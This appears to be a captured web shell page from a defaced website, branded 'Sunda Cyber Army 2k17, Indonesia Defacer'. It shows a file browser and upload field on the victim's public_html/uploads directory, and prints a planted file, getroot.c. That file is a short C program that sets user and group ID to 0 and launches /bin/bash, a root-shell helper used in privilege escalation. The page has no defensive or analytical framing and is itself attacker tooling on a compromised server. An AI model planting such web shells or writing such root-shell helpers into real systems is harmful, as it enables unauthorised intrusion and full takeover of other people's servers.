Sunda Cyber Army


* Sunda Cyber Army 2k17 *
Indonesia Defacer ~


Path : /home/dent/public_html/uploads/
File Upload :
Current File : /home/dent/public_html/uploads/getroot.c

#include <unistd.h>
#include <stdio.h>
int main (void)
{
	setgid(0);
	setuid(0);
	system("/bin/bash");
	return 0;
}